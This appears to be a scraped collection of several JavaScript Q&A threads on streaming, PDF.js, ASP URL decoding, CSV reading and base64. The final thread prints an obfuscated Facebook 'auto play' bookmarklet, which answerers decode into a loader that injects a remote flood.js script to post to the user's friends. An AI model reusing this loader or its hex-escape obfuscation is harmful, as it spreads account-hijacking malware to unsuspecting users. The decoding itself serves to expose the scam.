Firefox splits up Express response readableStream sometimes - javascript

I'm trying to stream HTML strings from my Express backend using a series of response.write for the sense of real-time updating, since I'm doing some HTTP requests in the middle, then appending them to the DOM. I'm extracting a pseudocode fragment from a given Wiki page as part of my response for context.
Everything is working fine in Chrome however Firefox seems to sometimes split the stream into two, obviously then not being able to parse a HTML string as it gets split half way through a tag.
Again, sometimes Firefox takes the larger response as a whole and works fine but most often it splits it.
Is this something to do with Firefox's reading of readableStream's vs Chrome? Or am I missing something in my code?
Edit: How the stream gets split (too low rep to imbed)
Stream being sent:
res.write(`<p class="update">→ Fetching page content...</p>`);
//Querying Wiki API here (code not shown)
//returning parsed HTML
parsed_frag = parsed_frag.replace(/\\n/g, '<br />');
res.write(`<p class="program">→ Fragment ${frag_num + 1} for ${response.data.parse.displaytitle}:</p>`);
res.write(`<div id="0" class="result">${parsed_frag}</div>`);
res.write(`<p class="program">→ (C = copy to clipboard, N = next fragment, R = restart)</p>`);
res.write(`<div class="program">~/pseudo-fetcher<div id="key-input" class="input key-input" contenteditable="true"></div></div>`);
res.status(200).end();
The parsed_frag variable holds the extracted HTML in a string. I want the whole thing to be read as a single part, rather than randomly split when read. Since I'm using res.write beforehand, res.send isn't useful.

Related

PDF.js returns text contents of the whole Document as each Page's textContent

I'm building a client-side app that uses PDF.js to parse the contents of a selected PDF file, and I'm running into a strange issue.
Everything seems to be working great. The code successfully loads the PDF.js PDF object, which then loops through the Pages of the document, and then gets the textContent for each Page.
After I let the code below run, and inspect the data in browser tools, I'm noticing that each Page's textContent object contains the text of the entire document, not ONLY the text from the related Page.
Has anybody experienced this before?
I pulled (and modified) most of the code I'm using from PDF.js posts here, and it's pretty straight-forward and seems to perform exactly as expected, aside from this issue:
testLoop: function (event) {
var file = event.target.files[0];
var fileReader = new FileReader();
fileReader.readAsArrayBuffer(file);
fileReader.onload = function () {
var typedArray = new Uint8Array(this.result);
PDFJS.getDocument(typedArray).then(function (pdf) {
for(var i = 1; i <= pdf.numPages; i++) {
pdf.getPage(i).then(function (page) {
page.getTextContent().then(function (textContent) {
console.log(textContent);
});
});
}
});
}
},
Additionally, the size of the returned textContent objects are slightly different for each Page, even though all of the objects share a common last object - the last bit of text for the whole document.
Here is an image of my inspector to illustrate that the objects are all very similarly sized.
Through manual inspection of the objects in the inspector shown, I can see that the data from, Page #1, for example, should really only consist of about ~140 array items, so why does the object for that page contain ~700 or so? And why the variation?
It looks like the issue here is the formatting of the PDF document I'm trying to parse. The PDF contains government records in a tabular format, which apparently was not composed according to modern PDF standards.
I've tested the script with different PDF files (which I know are properly composed), and the Page textContent objects returned are correctly split based on the content of the Pages.
In case anyone else runs into this issue in the future, there are at least two possible ways to handle the problem, as far as I have imagined so far:
Somehow reformat the malformed PDF to use updated standards, then process it. I don't know how to do this, nor am I sure it's realistic.
Select the largest of the returned Page textContent objects (since they all contain more or less the full text of the document) and do your operations on that textContent object.

URL Decoding with Serverside JS in ASP

I have a problem which is due to to IIS turning off + as spaces in querystrings.
We have clients posting some data to a hidden page as a querystring (jobs) and they sometimes post jobs with things like C++ in them etc - as they are passing the data we cannot expect them to encode it properly %2B as they are mostly non techie and sometimes they mix n match which is fun.
We also have places where we have querystrings within querystrings (sometimes up to 4 when passing filenames into a flash file for the click link, then the redirect url onclick that goes to a page that logs the click then the final url to go to show the customer!).
There are also other places where we have URLs in URLS such as redirect on login and so on.
Plus signs shouldn't really be a problem but we have found a few issues where they are so I just want one function that can sort it out.
For times when we have needed to encode ASP URLS (due to their being no Server.URLDecode function) even though we mostly don't need to as the page un-encodes them, we use a server side JavaScript ASP Classic (I know!) function e.g
<script language="JavaScript" RUNAT="SERVER">
function URLDecode(strIN)
{
// JS will return undefined for vars that have not been set yet whereas VB doesn't so handle
if(strIN){
var strOUT = decodeURIComponent(strIN);
return strOUT;
}else{ //for undefined or nulls or empty strings just return an empty string
return "";
}
}
</script>
However I am trying to get round any possible problems with + signs with a simple hack where I replace it first with a placeholder then replace it back after decoding e.g
<script language="JavaScript" RUNAT="SERVER">
function URLDecode(strIN)
{
// JS will return undefined for vars that have not been set yet whereas VB doesn't so handle
if(strIN){
strIN = strIN.replace("+","##PLUS##");
var strOUT = decodeURIComponent(strIN);
strOUT = strOUT.replace("##PLUS##","+")
return strOUT;
}else{ //for undefined or nulls or empty strings just return an empty string
return "";
}
}
</script>
However on running this I am getting the following error
Microsoft JScript runtime error '800a01b6'
Object doesn't support this property or method
/jobboard/scripts/VBS/EncodeFuncLib.asp, line 781
this line is
strIN = strIN.replace("+","##PLUS##");
I've tried
strIN = strIN.replace(/\+/g,"##PLUS##");
strIN = strIN.replace('/\+/','##PLUS##');
But nothing seems to work.
Running this code as client side JavaScript works fine so I don't know why it's not running server side.
I don't want to have to search 300+ files for places where this function is called server side and do the placeholder/replace around the URLDecode function so I would like to know what the problems is and how to solve it.is.
At first I thought it was because we had moved to Windows 2012 and IIS 8 and they had a new JS.dll that needed to be install (from reading up on it) - however we still have some 2003 servers on IIS 7 and I am getting the same problem there as well.
Unless my server guy isn't telling me something like the version of IIS we are using on 2003 I don't know what is going on.
Can anybody shed some light on this.
Am I being a numpty?
What could be the issue?
Thanks in advance for any help.
The regex to replace plus signs is strIN = strIN.replace(/\+/g,"##PLUS##"); Because + has a meaning in regex, it needs to be escaped with a backslash.

Javascript using File.Reader() to read line by line

This question is close but not quite close enough.
My HTML5 application reads a CSV file (although it applies to text as well) and displays some of the data on screen.
The problem I have is that the CSV files can be huge (with a 1GB file size limit). The good news is, I only need to display some of the data from the CSV file at any point.
The idea is something like (psudeo code)
var content;
var reader = OpenReader(myCsvFile)
var line = 0;
while (reader.hasLinesRemaning)
if (line % 10 == 1)
content = currentLine;
Loop to next line
There are enough articles about how to read the CSV file, I'm using
function openCSVFile(csvFileName){
var r = new FileReader();
r.onload = function(e) {
var contents = e.target.result;
var s = "";
};
r.readAsText(csvFileName);
}
but, I can't see how to read line at a time in Javascript OR even if it's possible.
My CSV data looks like
Some detail: date, ,
More detail: time, ,
val1, val2
val11, val12
#val11, val12
val21, val22
I need to strip out the first 2 lines, and also consider what to do with the line starting with a # (hence why I need to read through line at a time)
So, other than loading the lot into memory, do I have any options to read line at a time?
There is no readLine() method to do this as of now. However, some ideas to explore:
Reading from a blob does fire progress events. While it is not required by the specification, the engine might prematurely populate the .result property similar to an XMLHttpRequest.
The Streams API drafts a streaming .read(size) method for file readers. I don't think it is already implemented anywhere, though.
Blobs do have a slice method which returns a new Blob containing a part of the original data. The spec and the synchronous nature of the operation suggest that this is done via references, not copying, and should be quite performant. This would allow you to read the huge file chunk-by-chunk.
Admittedly, none of these methods do automatically stop at line endings. You will need to buffer the chunks manually, break them into lines and shift them out once they are complete. Also, these operations are working on bytes, not on characters, so there might be encoding problems with multi-byte characters that need to be handled.
See also: Reading line-by-line file in JavaScript on client side

DOM Exception 5 INVALID CHARACTER error on valid base64 image string in javascript

I'm trying to decode a base64 string for an image back into binary so it can be downloaded and displayed locally by an OS.
The string I have successfully renders when put as the src of an HTML IMG element with the data URI preface (data: img/png;base64, ) but when using the atob function or a goog closure function it fails.
However decoding succeeds when put in here: http://www.base64decode.org/
Any ideas?
EDIT:
I successfully got it to decode with another library other than the built-in JS function. But, it still won't open locally - on a Mac says it's damaged or in an unknown format and can't get opened.
The code is just something like:
imgEl.src = 'data:img/png;base64,' + contentStr; //this displays successfully
decodedStr = window.atob(contentStr); //this throws the invalid char exception but i just
//used a different script to get it decode successfully but still won't display locally
the base64 string itself is too long to display here (limit is 30,000 characters)
I was just banging my head against the wall on this one for awhile.
There are a couple of possible causes to the problem. 1) Utf-8 problems. There's a good write up + a solution for that here.
In my case, I also had to make sure all the whitespace was out of the string before passing it to atob. e.g.
function decodeFromBase64(input) {
input = input.replace(/\s/g, '');
return atob(input);
}
What was really frustrating was that the base64 parsed correctly using the base64 library in python, but not in JS.
I had to remove the data:audio/wav;base64, in front of the b64, as this was given as part of the b64.
var data = b64Data.substring(b64Data.indexOf(',')+1);
var processed = atob(data);

Can someone decrypt this javascript

i found it in a forum that tell me that this code would give me auto play for facebook games but i afraid that this is not what they say, im afraid that this is malicious script
please help :)
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
Let's start by decoding the escape sequences, and get rid of that _0x8dd5 variable name:
var x=[
"src","script","createElement","http://ug-radio.co.cc/flood.js",
"appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);
Substituting the string from the array, you are left with:
(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);
So, what the script does is simply:
a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);
I.e. it loads the Javascript http://ug-radio.co.cc/flood.js in the page.
Looking at the script in the file that is loaded, it calls itself "Wallflood By X-Cisadane". It seems to get a list of your friends and post a message to (or perhaps from) all of them.
Certainly nothing to do with auto play for games.
I opened firebug, and pasted part of the script into the console (being careful to only paste the part that created a variable, rather than running code). This is what I got:
what I pasted:
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
the result:
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
In short, what this looks like is script to load an external Javascript file from a remote server with a very dodgy looking domain name.
There are a few characters which are not converted quite to what you'd expect. This could be typos (unlikely) or deliberate further obfuscation, to fool any automated malware checker looking for scripts containing URLs or references to createElement, etc. The remainder of the script patches those characters back into place individually before running it.
The variable name _0x8dd5 is chosen to look like hex code and make the whole thing harder to read, but in fact it's just a regular Javascript variable name. It is referenced repeatedly in the rest of the script as it copies characters from one part of the string to another to fix the deliberate gaps.
Definitely a malicious script.
I recommend burning it immediately! ;-)
Well, the declared var is actually this:
var _0x8dd5= [
'src', 'script', 'cx7 2eateElement',
'x 68ttp://ug-rad io.co.cc/flox 6Fd.js', 'appendC x68ild', 'body'
];
The rest is simple to figure out.
Well your first statement is setting up an array with roughly the following contents:
var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];
I say "roughly" because I'm using Chrome's JavaScript console to parse the data, and some things seem to be a bit garbled. I've cleaned up the garbled portions as best as I can.
The rest appears to be calling something along the lines of:
var b = document;
var a = b.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
b.body.appendChild(a);
So basically, it is adding a (probably malicious) script to the document.
You most probably know how to decode this or how it was encoded, but for those that aren't sure, it is nothing but 2-digit hexadecimal escape sequence. It could also be 4 digit one using \udddd (eg. "\u0032" is "2") or \ddd for octal.
Decoding hex string in javascript

Categories